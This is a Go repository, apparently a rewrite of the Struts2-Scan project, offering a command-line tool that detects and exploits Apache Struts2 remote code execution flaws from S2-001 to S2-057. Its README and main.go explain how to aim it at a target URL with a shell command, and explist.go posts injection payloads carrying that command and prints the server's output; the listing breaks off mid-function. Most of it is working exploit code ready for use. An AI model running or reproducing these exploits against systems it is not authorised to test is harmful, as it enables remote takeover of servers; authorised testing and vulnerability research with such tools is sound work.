├── .github
    ├── conf
    │   └── .goreleaser.yml
    └── workflows
    │   └── release1.yml
├── .idea
    ├── .gitignore
    ├── GolangStruts2.iml
    ├── modules.xml
    └── vcs.xml
├── README.md
├── go.mod
├── go.sum
├── main.go
└── pkg
    ├── explist.go
    └── utils
        └── utils.go


/.github/conf/.goreleaser.yml:
--------------------------------------------------------------------------------
 1 | before:
 2 |   hooks:
 3 |     - sudo apt -y install libprotobuf-dev protobuf-compiler protoc-gen-go
 4 |     - go mod tidy
 5 |     - go generate ./...
 6 | builds:
 7 |   - id: "with-upx"
 8 |     env:
 9 |       - CGO_ENABLED=0
10 |     goos:
11 |       - linux
12 |       - windows
13 |       - darwin
14 |     goarch:
15 |       - amd64
16 |       - arm64
17 |       - arm
18 |       - "386"
19 |     goarm:
20 |       - "6"
21 |       - "7"
22 |     flags:
23 |       - -trimpath
24 |     ldflags:
25 |       - -s -w -X main.version={{.Version}} -X main.commit={{.Commit}} -X main.date={{ .CommitDate }} -X main.builtBy=goreleaser
26 |     ignore:
27 |       - goos: windows
28 |         goarch: arm64
29 |       - goos: windows
30 |         goarch: arm
31 |       - goos: linux
32 |         goarch: mips64
33 |     hooks:
34 |       post: upx --best -f -q "{{ .Path }}"
35 | 
36 |   # UnknownExecutableFormatException
37 |   # CantPackException: can't pack new-exe
38 |   - id: "without-upx"
39 |     env:
40 |       - CGO_ENABLED=0
41 |     goos:
42 |       - linux
43 |       - windows
44 |       - darwin
45 |     goarch:
46 |       - mips64
47 |       - arm
48 |     goarm:
49 |       - "6"
50 |       - "7"
51 |     flags:
52 |       - -trimpath
53 |     ldflags:
54 |       - -s -w -X main.version={{.Version}} -X main.commit={{.Commit}} -X main.date={{ .CommitDate }} -X main.builtBy=goreleaser
55 |     ignore:
56 |       - goos: linux
57 |         goarch: arm
58 | 
59 | 
60 | archives:
61 |   - format: zip
62 |     name_template: '{{ .ProjectName }}_{{ .Os }}_{{ .Arch }}{{ if .Arm }}v{{ .Arm }}{{ end }}'
63 | checksum:
64 |   name_template: 'checksums.txt'
65 | snapshot:
66 |   name_template: "{{ incpatch .Version }}-next"
67 | changelog:
68 |   sort: asc
69 |   filters:
70 |     exclude:
71 |       - '^docs:'
72 |       - '^test:'


--------------------------------------------------------------------------------
/.github/workflows/release1.yml:
--------------------------------------------------------------------------------
 1 | name: goreleaser
 2 | 
 3 | on:
 4 |   push:
 5 |     tags:
 6 |       - '*'
 7 | 
 8 | permissions:
 9 |   contents: write
10 | 
11 | jobs:
12 |   goreleaser:
13 |     runs-on: ubuntu-latest
14 |     timeout-minutes: 60
15 |     steps:
16 |       -
17 |         name: Checkout
18 |         uses: actions/checkout@v4
19 |         with:
20 |           fetch-depth: 0
21 |       -
22 |         name: Set up Go
23 |         uses: actions/setup-go@v4
24 |         with:
25 |           go-version-file: 'go.mod'
26 |           check-latest: true
27 |       -
28 |         name: Run GoReleaser
29 |         uses: goreleaser/goreleaser-action@v4
30 |         with:
31 |           distribution: goreleaser
32 |           version: latest
33 |           args: -f .github/conf/.goreleaser.yml
34 |           workdir: .
35 |         env:
36 |           GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}


--------------------------------------------------------------------------------
/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # 默认忽略的文件
2 | /shelf/
3 | /workspace.xml
4 | # 基于编辑器的 HTTP 客户端请求
5 | /httpRequests/
6 | # Datasource local storage ignored files
7 | /dataSources/
8 | /dataSources.local.xml
9 | 


--------------------------------------------------------------------------------
/.idea/GolangStruts2.iml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <module type="WEB_MODULE" version="4">
3 |   <component name="Go" enabled="true" />
4 |   <component name="NewModuleRootManager">
5 |     <content url="file://$MODULE_DIR$" />
6 |     <orderEntry type="inheritedJdk" />
7 |     <orderEntry type="sourceFolder" forTests="false" />
8 |   </component>
9 | </module>


--------------------------------------------------------------------------------
/.idea/modules.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <project version="4">
3 |   <component name="ProjectModuleManager">
4 |     <modules>
5 |       <module fileurl="file://$PROJECT_DIR$/.idea/GolangStruts2.iml" filepath="$PROJECT_DIR$/.idea/GolangStruts2.iml" />
6 |     </modules>
7 |   </component>
8 | </project>


--------------------------------------------------------------------------------
/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <project version="4">
3 |   <component name="VcsDirectoryMappings">
4 |     <mapping directory="" vcs="Git" />
5 |   </component>
6 | </project>


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | 用Golang重写[Struts2-Scan](https://github.com/HatBoy/Struts2-Scan)项目。
 2 | 
 3 | 工具参数说明
 4 | ```
 5 | Usage of main.exe:
 6 |   -u url
 7 |       you target, example: https://192.168.1.1
 8 |   -c command
 9 |       you want execute command, example: "whoami"
10 |   -n name
11 |       漏洞名，可选S2-001, S2-003, S2-005, S2-007, S2-008, S2-009, S2-012, S2-013, S2-015, S2-016, S2-019,
12 |                 S2-029, S2-032, S2-033, S2-037, S2-045, S2-046, S2-048, S2-052, S2-053, S2-devMode, S2-057,allPoc(除了s2-052)
13 |                 (单独使用POC | EXP 例: S2-001 | s2-001_Cmd | s2-001_WebPath)
14 |   -d data
15 |           POST , 需要使用的payload使用{exp}填充, 如: name=test&passwd={exp}
16 |   -t Type
17 |       指定contentType头
18 | ```
19 | 
20 | + 一键检测
21 | 
22 | ```
23 | GolangStruts2.exe -u http://127.0.0.1 -n allPoc
24 | ```
25 | 
26 | + 单个利用
27 | 
28 | ```
29 | GolangStruts2.exe -u http://127.0.0.1 -n S2-001 -c whoami
30 | ```
31 | 


--------------------------------------------------------------------------------
/go.mod:
--------------------------------------------------------------------------------
 1 | module Struts2Scan
 2 | 
 3 | go 1.21
 4 | 
 5 | require (
 6 | 	github.com/fatih/color v1.14.1
 7 | 	github.com/imroc/req/v3 v3.42.1
 8 | )
 9 | 
10 | require (
11 | 	github.com/andybalholm/brotli v1.0.6 // indirect
12 | 	github.com/cloudflare/circl v1.3.6 // indirect
13 | 	github.com/gaukas/godicttls v0.0.4 // indirect
14 | 	github.com/go-task/slim-sprig v0.0.0-20230315185526-52ccab3ef572 // indirect
15 | 	github.com/google/pprof v0.0.0-20231101202521-4ca4178f5c7a // indirect
16 | 	github.com/hashicorp/errwrap v1.1.0 // indirect
17 | 	github.com/hashicorp/go-multierror v1.1.1 // indirect
18 | 	github.com/klauspost/compress v1.17.2 // indirect
19 | 	github.com/mattn/go-colorable v0.1.13 // indirect
20 | 	github.com/mattn/go-isatty v0.0.17 // indirect
21 | 	github.com/onsi/ginkgo/v2 v2.13.1 // indirect
22 | 	github.com/quic-go/qpack v0.4.0 // indirect
23 | 	github.com/quic-go/qtls-go1-20 v0.4.1 // indirect
24 | 	github.com/quic-go/quic-go v0.40.0 // indirect
25 | 	github.com/refraction-networking/utls v1.5.4 // indirect
26 | 	github.com/stretchr/testify v1.8.0 // indirect
27 | 	go.uber.org/mock v0.3.0 // indirect
28 | 	golang.org/x/crypto v0.15.0 // indirect
29 | 	golang.org/x/exp v0.0.0-20231110203233-9a3e6036ecaa // indirect
30 | 	golang.org/x/mod v0.14.0 // indirect
31 | 	golang.org/x/net v0.18.0 // indirect
32 | 	golang.org/x/sys v0.14.0 // indirect
33 | 	golang.org/x/text v0.14.0 // indirect
34 | 	golang.org/x/tools v0.15.0 // indirect
35 | )
36 | 


--------------------------------------------------------------------------------
/go.sum:
--------------------------------------------------------------------------------
 1 | github.com/andybalholm/brotli v1.0.6 h1:Yf9fFpf49Zrxb9NlQaluyE92/+X7UVHlhMNJN2sxfOI=
 2 | github.com/andybalholm/brotli v1.0.6/go.mod h1:fO7iG3H7G2nSZ7m0zPUDn85XEX2GTukHGRSepvi9Eig=
 3 | github.com/cloudflare/circl v1.3.6 h1:/xbKIqSHbZXHwkhbrhrt2YOHIwYJlXH94E3tI/gDlUg=
 4 | github.com/cloudflare/circl v1.3.6/go.mod h1:5XYMA4rFBvNIrhs50XuiBJ15vF2pZn4nnUKZrLbUZFA=
 5 | github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
 6 | github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c=
 7 | github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
 8 | github.com/fatih/color v1.14.1 h1:qfhVLaG5s+nCROl1zJsZRxFeYrHLqWroPOQ8BWiNb4w=
 9 | github.com/fatih/color v1.14.1/go.mod h1:2oHN61fhTpgcxD3TSWCgKDiH1+x4OiDVVGH8WlgGZGg=
10 | github.com/gaukas/godicttls v0.0.4 h1:NlRaXb3J6hAnTmWdsEKb9bcSBD6BvcIjdGdeb0zfXbk=
11 | github.com/gaukas/godicttls v0.0.4/go.mod h1:l6EenT4TLWgTdwslVb4sEMOCf7Bv0JAK67deKr9/NCI=
12 | github.com/go-logr/logr v1.3.0 h1:2y3SDp0ZXuc6/cjLSZ+Q3ir+QB9T/iG5yYRXqsagWSY=
13 | github.com/go-logr/logr v1.3.0/go.mod h1:9T104GzyrTigFIr8wt5mBrctHMim0Nb2HLGrmQ40KvY=
14 | github.com/go-task/slim-sprig v0.0.0-20230315185526-52ccab3ef572 h1:tfuBGBXKqDEevZMzYi5KSi8KkcZtzBcTgAUUtapy0OI=
15 | github.com/go-task/slim-sprig v0.0.0-20230315185526-52ccab3ef572/go.mod h1:9Pwr4B2jHnOSGXyyzV8ROjYa2ojvAY6HCGYYfMoC3Ls=
16 | github.com/golang/protobuf v1.5.3 h1:KhyjKVUg7Usr/dYsdSqoFveMYd5ko72D+zANwlG1mmg=
17 | github.com/golang/protobuf v1.5.3/go.mod h1:XVQd3VNwM+JqD3oG2Ue2ip4fOMUkwXdXDdiuN0vRsmY=
18 | github.com/google/go-cmp v0.6.0 h1:ofyhxvXcZhMsU5ulbFiLKl/XBFqE1GSq7atu8tAmTRI=
19 | github.com/google/go-cmp v0.6.0/go.mod h1:17dUlkBOakJ0+DkrSSNjCkIjxS6bF9zb3elmeNGIjoY=
20 | github.com/google/pprof v0.0.0-20231101202521-4ca4178f5c7a h1:fEBsGL/sjAuJrgah5XqmmYsTLzJp/TO9Lhy39gkverk=
21 | github.com/google/pprof v0.0.0-20231101202521-4ca4178f5c7a/go.mod h1:czg5+yv1E0ZGTi6S6vVK1mke0fV+FaUhNGcd6VRS9Ik=
22 | github.com/hashicorp/errwrap v1.0.0/go.mod h1:YH+1FKiLXxHSkmPseP+kNlulaMuP3n2brvKWEqk/Jc4=
23 | github.com/hashicorp/errwrap v1.1.0 h1:OxrOeh75EUXMY8TBjag2fzXGZ40LB6IKw45YeGUDY2I=
24 | github.com/hashicorp/errwrap v1.1.0/go.mod h1:YH+1FKiLXxHSkmPseP+kNlulaMuP3n2brvKWEqk/Jc4=
25 | github.com/hashicorp/go-multierror v1.1.1 h1:H5DkEtf6CXdFp0N0Em5UCwQpXMWke8IA0+lD48awMYo=
26 | github.com/hashicorp/go-multierror v1.1.1/go.mod h1:iw975J/qwKPdAO1clOe2L8331t/9/fmwbPZ6JB6eMoM=
27 | github.com/imroc/req/v3 v3.42.1 h1:g82SouLvX7pqwqJjpQJYrVvuI+LOycWhyuwxtLlyQJk=
28 | github.com/imroc/req/v3 v3.42.1/go.mod h1:W7dOrfQORA9nFoj+CafIZ6P5iyk+rWdbp2sffOAvABU=
29 | github.com/klauspost/compress v1.17.2 h1:RlWWUY/Dr4fL8qk9YG7DTZ7PDgME2V4csBXA8L/ixi4=
30 | github.com/klauspost/compress v1.17.2/go.mod h1:ntbaceVETuRiXiv4DpjP66DpAtAGkEQskQzEyD//IeE=
31 | github.com/mattn/go-colorable v0.1.13 h1:fFA4WZxdEF4tXPZVKMLwD8oUnCTTo08duU7wxecdEvA=
32 | github.com/mattn/go-colorable v0.1.13/go.mod h1:7S9/ev0klgBDR4GtXTXX8a3vIGJpMovkB8vQcUbaXHg=
33 | github.com/mattn/go-isatty v0.0.16/go.mod h1:kYGgaQfpe5nmfYZH+SKPsOc2e4SrIfOl2e/yFXSvRLM=
34 | github.com/mattn/go-isatty v0.0.17 h1:BTarxUcIeDqL27Mc+vyvdWYSL28zpIhv3RoTdsLMPng=
35 | github.com/mattn/go-isatty v0.0.17/go.mod h1:kYGgaQfpe5nmfYZH+SKPsOc2e4SrIfOl2e/yFXSvRLM=
36 | github.com/onsi/ginkgo/v2 v2.13.1 h1:LNGfMbR2OVGBfXjvRZIZ2YCTQdGKtPLvuI1rMCCj3OU=
37 | github.com/onsi/ginkgo/v2 v2.13.1/go.mod h1:XStQ8QcGwLyF4HdfcZB8SFOS/MWCgDuXMSBe6zrvLgM=
38 | github.com/onsi/gomega v1.29.0 h1:KIA/t2t5UBzoirT4H9tsML45GEbo3ouUnBHsCfD2tVg=
39 | github.com/onsi/gomega v1.29.0/go.mod h1:9sxs+SwGrKI0+PWe4Fxa9tFQQBG5xSsSbMXOI8PPpoQ=
40 | github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=
41 | github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
42 | github.com/quic-go/qpack v0.4.0 h1:Cr9BXA1sQS2SmDUWjSofMPNKmvF6IiIfDRmgU0w1ZCo=
43 | github.com/quic-go/qpack v0.4.0/go.mod h1:UZVnYIfi5GRk+zI9UMaCPsmZ2xKJP7XBUvVyT1Knj9A=
44 | github.com/quic-go/qtls-go1-20 v0.4.1 h1:D33340mCNDAIKBqXuAvexTNMUByrYmFYVfKfDN5nfFs=
45 | github.com/quic-go/qtls-go1-20 v0.4.1/go.mod h1:X9Nh97ZL80Z+bX/gUXMbipO6OxdiDi58b/fMC9mAL+k=
46 | github.com/quic-go/quic-go v0.40.0 h1:GYd1iznlKm7dpHD7pOVpUvItgMPo/jrMgDWZhMCecqw=
47 | github.com/quic-go/quic-go v0.40.0/go.mod h1:PeN7kuVJ4xZbxSv/4OX6S1USOX8MJvydwpTx31vx60c=
48 | github.com/refraction-networking/utls v1.5.4 h1:9k6EO2b8TaOGsQ7Pl7p9w6PUhx18/ZCeT0WNTZ7Uw4o=
49 | github.com/refraction-networking/utls v1.5.4/go.mod h1:SPuDbBmgLGp8s+HLNc83FuavwZCFoMmExj+ltUHiHUw=
50 | github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
51 | github.com/stretchr/objx v0.4.0/go.mod h1:YvHI0jy2hoMjB+UWwv71VJQ9isScKT/TqJzVSSt89Yw=
52 | github.com/stretchr/testify v1.6.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
53 | github.com/stretchr/testify v1.7.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
54 | github.com/stretchr/testify v1.8.0 h1:pSgiaMZlXftHpm5L7V1+rVB+AZJydKsMxsQBIJw4PKk=
55 | github.com/stretchr/testify v1.8.0/go.mod h1:yNjHg4UonilssWZ8iaSj1OCr/vHnekPRkoO+kdMU+MU=
56 | go.uber.org/mock v0.3.0 h1:3mUxI1No2/60yUYax92Pt8eNOEecx2D3lcXZh2NEZJo=
57 | go.uber.org/mock v0.3.0/go.mod h1:a6FSlNadKUHUa9IP5Vyt1zh4fC7uAwxMutEAscFbkZc=
58 | golang.org/x/crypto v0.15.0 h1:frVn1TEaCEaZcn3Tmd7Y2b5KKPaZ+I32Q2OA3kYp5TA=
59 | golang.org/x/crypto v0.15.0/go.mod h1:4ChreQoLWfG3xLDer1WdlH5NdlQ3+mwnQq1YTKY+72g=
60 | golang.org/x/exp v0.0.0-20231110203233-9a3e6036ecaa h1:FRnLl4eNAQl8hwxVVC17teOw8kdjVDVAiFMtgUdTSRQ=
61 | golang.org/x/exp v0.0.0-20231110203233-9a3e6036ecaa/go.mod h1:zk2irFbV9DP96SEBUUAy67IdHUaZuSnrz1n472HUCLE=
62 | golang.org/x/mod v0.14.0 h1:dGoOF9QVLYng8IHTm7BAyWqCqSheQ5pYWGhzW00YJr0=
63 | golang.org/x/mod v0.14.0/go.mod h1:hTbmBsO62+eylJbnUtE2MGJUyE7QWk4xUqPFrRgJ+7c=
64 | golang.org/x/net v0.18.0 h1:mIYleuAkSbHh0tCv7RvjL3F6ZVbLjq4+R7zbOn3Kokg=
65 | golang.org/x/net v0.18.0/go.mod h1:/czyP5RqHAH4odGYxBJ1qz0+CE5WZ+2j1YgoEo8F2jQ=
66 | golang.org/x/sys v0.0.0-20220811171246-fbc7d0a398ab/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
67 | golang.org/x/sys v0.14.0 h1:Vz7Qs629MkJkGyHxUlRHizWJRG2j8fbQKjELVSNhy7Q=
68 | golang.org/x/sys v0.14.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA=
69 | golang.org/x/text v0.14.0 h1:ScX5w1eTa3QqT8oi6+ziP7dTV1S2+ALU0bI+0zXKWiQ=
70 | golang.org/x/text v0.14.0/go.mod h1:18ZOQIKpY8NJVqYksKHtTdi31H5itFRjB5/qKTNYzSU=
71 | golang.org/x/tools v0.15.0 h1:zdAyfUGbYmuVokhzVmghFl2ZJh5QhcfebBgmVPFYA+8=
72 | golang.org/x/tools v0.15.0/go.mod h1:hpksKq4dtpQWS1uQ61JkdqWM3LscIS6Slf+VVkm+wQk=
73 | google.golang.org/protobuf v1.28.0 h1:w43yiav+6bVFTBQFZX0r7ipe9JQ1QsbMgHwbBziscLw=
74 | google.golang.org/protobuf v1.28.0/go.mod h1:HV8QOd/L58Z+nl8r43ehVNZIU/HEI6OcFqwMG9pJV4I=
75 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
76 | gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
77 | gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA=
78 | gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
79 | 


--------------------------------------------------------------------------------
/main.go:
--------------------------------------------------------------------------------
 1 | package main
 2 | 
 3 | import (
 4 | 	"flag"
 5 | 	"fmt"
 6 | 	"os"
 7 | )
 8 | 
 9 | var (
10 | 	url     string
11 | 	command string
12 | 	Name    string
13 | 	Data    string
14 | 	Type    string
15 | )
16 | 
17 | func usage() {
18 | 	fmt.Println(`Usage of main.exe:
19 |   -u url
20 |       you target, example: https://192.168.1.1
21 |   -c command
22 |       you want execute command, example: "whoami"
23 |   -n name
24 |       漏洞名，可选S2-001, S2-003, S2-005, S2-007, S2-008, S2-009, S2-012, S2-013, S2-015, S2-016, S2-019,
25 | 		S2-029, S2-032, S2-033, S2-037, S2-045, S2-046, S2-048, S2-052, S2-053, S2-devMode, S2-057,allPoc(除了s2-052)
26 | 		(单独使用POC | EXP 例: S2-001 | s2-001_Cmd | s2-001_WebPath)
27 |   -d data
28 | 	  指定POST参数
29 |   -t Type
30 |       指定contentType头`)
31 | }
32 | 
33 | func banner() {
34 | 	ban := `
35 | ███████╗████████╗██████╗ ██╗   ██╗████████╗███████╗██████╗     ██████╗  ██████╗ 
36 | ██╔════╝╚══██╔══╝██╔══██╗██║   ██║╚══██╔══╝██╔════╝╚════██╗   ██╔════╝ ██╔═══██╗
37 | ███████╗   ██║   ██████╔╝██║   ██║   ██║   ███████╗ █████╔╝   ██║  ███╗██║   ██║
38 | ╚════██║   ██║   ██╔══██╗██║   ██║   ██║   ╚════██║██╔═══╝    ██║   ██║██║   ██║
39 | ███████║   ██║   ██║  ██║╚██████╔╝   ██║   ███████║███████╗██╗╚██████╔╝╚██████╔╝
40 | ╚══════╝   ╚═╝   ╚═╝  ╚═╝ ╚═════╝    ╚═╝   ╚══════╝╚══════╝╚═╝ ╚═════╝  ╚═════╝    by Nu1r`
41 | 	fmt.Println(ban)
42 | }
43 | 
44 | func main() {
45 | 	flag.StringVar(&url, "u", "", "your target")
46 | 	flag.StringVar(&command, "c", "", "command")
47 | 	flag.StringVar(&Name, "n", "", "(单独使用POC | EXP 例: S2-001 | s2-001_Cmd | s2-001_WebPath)")
48 | 	flag.StringVar(&Data, "d", "", "POST参数")
49 | 	flag.StringVar(&Type, "t", "", "指定contentType头")
50 | 	flag.Usage = usage
51 | 	flag.Parse()
52 | 	banner()
53 | 
54 | 	if url == "" || Name == "" {
55 | 		usage()
56 | 		os.Exit(0)
57 | 	}
58 | 
59 | 	Exp := WorkExp{
60 | 		Url: url,     // URL
61 | 		Cmd: command, // command
62 | 		/*  POC验证, 命令执行, WEB根路径读取
63 | 		S2-001, S2-003, S2-005, S2-007, S2-008, S2-009, S2-012, S2-013, S2-015, S2-016, S2-019,
64 | 		S2-029, S2-032, S2-033, S2-037, S2-045, S2-046, S2-048, S2-052, S2-053, S2-devMode, S2-057,allPoc(除了s2-052)
65 | 		(单独使用POC | EXP 例: S2-001 | s2-001_Cmd | s2-001_WebPath)
66 | 		*/
67 | 		CveName:     Name,
68 | 		postData:    Data, // POST | GET参数, 需要使用的payload使用{exp}填充, 如: name=test&passwd={exp}
69 | 		contentType: Type, // 例: application/x-www-form-urlencoded
70 | 	}
71 | 	Exp.Run()
72 | }
73 | 


--------------------------------------------------------------------------------
/pkg/explist.go:
--------------------------------------------------------------------------------
   1 | package main
   2 | 
   3 | import (
   4 | 	"Struts2Scan/pkg/utils"
   5 | 	"fmt"
   6 | 	"github.com/fatih/color"
   7 | 	"github.com/imroc/req/v3"
   8 | 	"math/rand"
   9 | 	"strconv"
  10 | 	"strings"
  11 | 	"time"
  12 | )
  13 | 
  14 | type WorkExp struct {
  15 | 	Url         string // url 必须带有参数
  16 | 	Cmd         string
  17 | 	CveName     string
  18 | 	postData    string // POST | GET参数, 需要使用的payload使用{exp}填充, 如: name=test&passwd={exp}
  19 | 	contentType string // 默认 application/x-www-form-urlencoded
  20 | }
  21 | 
  22 | var client = req.C().
  23 | 	SetUserAgent(utils.GlobalUserAgent).
  24 | 	SetTimeout(5 * time.Second).
  25 | 	EnableDumpEachRequest()
  26 | 
  27 | // PocS001 S2-001:影响版本Struts 2.0.0-2.0.8; POST请求发送数据; 默认参数为:username,password; 支持获取WEB路径,任意命令执行
  28 | func (c *WorkExp) PocS001() {
  29 | 	var (
  30 | 		resp *req.Response
  31 | 		err  error
  32 | 	)
  33 | 	r1 := rand.Intn(10000) + 1000
  34 | 	r2 := rand.Intn(10000) + 1000
  35 | 	Payload := strings.Replace(utils.ExecPayload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
  36 | 	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
  37 | 	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
  38 | 	if c.postData == "" {
  39 | 		c.postData = "username=" + Payload
  40 | 	} else {
  41 | 		c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
  42 | 	}
  43 | 	if c.contentType == "" {
  44 | 		resp, err = client.R().
  45 | 			SetBody(c.postData).
  46 | 			SetHeader("Content-Type", "application/x-www-form-urlencoded").
  47 | 			Post(c.Url)
  48 | 	} else {
  49 | 		resp, err = client.R().
  50 | 			SetBody(c.postData).
  51 | 			SetHeader("Content-Type", c.contentType).
  52 | 			Post(c.Url)
  53 | 	}
  54 | 	if err != nil {
  55 | 
  56 | 	}
  57 | 	if resp != nil {
  58 | 		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
  59 | 			color.Red("*Found Struts2-001！")
  60 | 		} else {
  61 | 			if c.postData == "" {
  62 | 				c.postData = "password=" + Payload
  63 | 			} else {
  64 | 				c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
  65 | 			}
  66 | 			if c.contentType == "" {
  67 | 				resp, err = client.R().
  68 | 					SetBody(c.postData).
  69 | 					SetHeader("Content-Type", "application/x-www-form-urlencoded").
  70 | 					Post(c.Url)
  71 | 			} else {
  72 | 				resp, err = client.R().
  73 | 					SetBody(c.postData).
  74 | 					SetHeader("Content-Type", c.contentType).
  75 | 					Post(c.Url)
  76 | 			}
  77 | 			if err != nil {
  78 | 
  79 | 			}
  80 | 			if resp != nil {
  81 | 				if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
  82 | 					color.Red("*Found Struts2-001！")
  83 | 				} else {
  84 | 					fmt.Println("Struts2-001 Not Vulnerable.")
  85 | 				}
  86 | 			}
  87 | 		}
  88 | 	}
  89 | }
  90 | 
  91 | func (c *WorkExp) ExpS001Cmd() {
  92 | 	var (
  93 | 		resp *req.Response
  94 | 		err  error
  95 | 	)
  96 | 	Payload := strings.Replace(utils.ExecPayload, "{cmd}", c.Cmd, -1)
  97 | 	if c.postData == "" {
  98 | 		c.postData = "username=" + Payload
  99 | 	} else {
 100 | 		c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
 101 | 	}
 102 | 	if c.contentType == "" {
 103 | 		resp, err = client.R().
 104 | 			SetBody(c.postData).
 105 | 			SetHeader("Content-Type", "application/x-www-form-urlencoded").
 106 | 			Post(c.Url)
 107 | 	} else {
 108 | 		resp, err = client.R().
 109 | 			SetBody(c.postData).
 110 | 			SetHeader("Content-Type", c.contentType).
 111 | 			Post(c.Url)
 112 | 	}
 113 | 	if err != nil {
 114 | 
 115 | 	}
 116 | 	if resp != nil {
 117 | 		fmt.Println(resp.String())
 118 | 	}
 119 | 
 120 | 	if c.postData == "" {
 121 | 		c.postData = "password=" + Payload
 122 | 	} else {
 123 | 		c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
 124 | 	}
 125 | 	if c.contentType == "" {
 126 | 		resp, err = client.R().
 127 | 			SetBody(c.postData).
 128 | 			SetHeader("Content-Type", "application/x-www-form-urlencoded").
 129 | 			Post(c.Url)
 130 | 	} else {
 131 | 		resp, err = client.R().
 132 | 			SetBody(c.postData).
 133 | 			SetHeader("Content-Type", c.contentType).
 134 | 			Post(c.Url)
 135 | 	}
 136 | 	if err != nil {
 137 | 
 138 | 	}
 139 | 	if resp != nil {
 140 | 		fmt.Println(resp.String())
 141 | 	}
 142 | 
 143 | }
 144 | 
 145 | func (c *WorkExp) ExpS001GetPath() {
 146 | 	var (
 147 | 		resp *req.Response
 148 | 		err  error
 149 | 	)
 150 | 	if c.postData == "" {
 151 | 		c.postData = "username=" + utils.WebPath
 152 | 	} else {
 153 | 		c.postData = strings.Replace(c.postData, "{exp}", utils.WebPath, -1)
 154 | 	}
 155 | 	if c.contentType == "" {
 156 | 		resp, err = client.R().
 157 | 			SetBody(c.postData).
 158 | 			SetHeader("Content-Type", "application/x-www-form-urlencoded").
 159 | 			Post(c.Url)
 160 | 	} else {
 161 | 		resp, err = client.R().
 162 | 			SetBody(c.postData).
 163 | 			SetHeader("Content-Type", c.contentType).
 164 | 			Post(c.Url)
 165 | 	}
 166 | 	if err != nil {
 167 | 
 168 | 	}
 169 | 	if resp != nil {
 170 | 		fmt.Println(resp)
 171 | 	}
 172 | 
 173 | 	if c.postData == "" {
 174 | 		c.postData = "password=" + utils.WebPath
 175 | 	} else {
 176 | 		c.postData = strings.Replace(c.postData, "{exp}", utils.WebPath, -1)
 177 | 	}
 178 | 	if c.contentType == "" {
 179 | 		resp, err = client.R().
 180 | 			SetBody(c.postData).
 181 | 			SetHeader("Content-Type", "application/x-www-form-urlencoded").
 182 | 			Post(c.Url)
 183 | 	} else {
 184 | 		resp, err = client.R().
 185 | 			SetBody(c.postData).
 186 | 			SetHeader("Content-Type", c.contentType).
 187 | 			Post(c.Url)
 188 | 	}
 189 | 	if err != nil {
 190 | 
 191 | 	}
 192 | 	if resp != nil {
 193 | 		fmt.Println(resp)
 194 | 	}
 195 | }
 196 | 
 197 | // PocS003 S2-003:影响版本Struts 2.0.0-2.0.11.2; GET请求发送数据;
 198 | func (c *WorkExp) PocS003() {
 199 | 	r1 := rand.Intn(10000) + 1000
 200 | 	r2 := rand.Intn(10000) + 1000
 201 | 	reqUrl := c.Url + utils.Exec_payload
 202 | 	reqUrl = strings.Replace(reqUrl, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
 203 | 	reqUrl = strings.Replace(reqUrl, "{{r1}}", strconv.Itoa(r1), -1)
 204 | 	reqUrl = strings.Replace(reqUrl, "{{r2}}", strconv.Itoa(r2), -1)
 205 | 	resp, err := client.R().
 206 | 		Get(reqUrl)
 207 | 	if err != nil {
 208 | 
 209 | 	}
 210 | 	if resp != nil {
 211 | 		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
 212 | 			color.Red("*Found Struts2-003！")
 213 | 		} else {
 214 | 			fmt.Println("Struts2-003 Not Vulnerable.")
 215 | 		}
 216 | 	}
 217 | }
 218 | 
 219 | func (c *WorkExp) ExpS003Cmd() {
 220 | 	var (
 221 | 		resp *req.Response
 222 | 		err  error
 223 | 	)
 224 | 	Payload := strings.Replace(utils.Exec_payload, "{cmd}", c.Cmd, -1)
 225 | 	c.Url = c.Url + Payload
 226 | 	if c.contentType == "" {
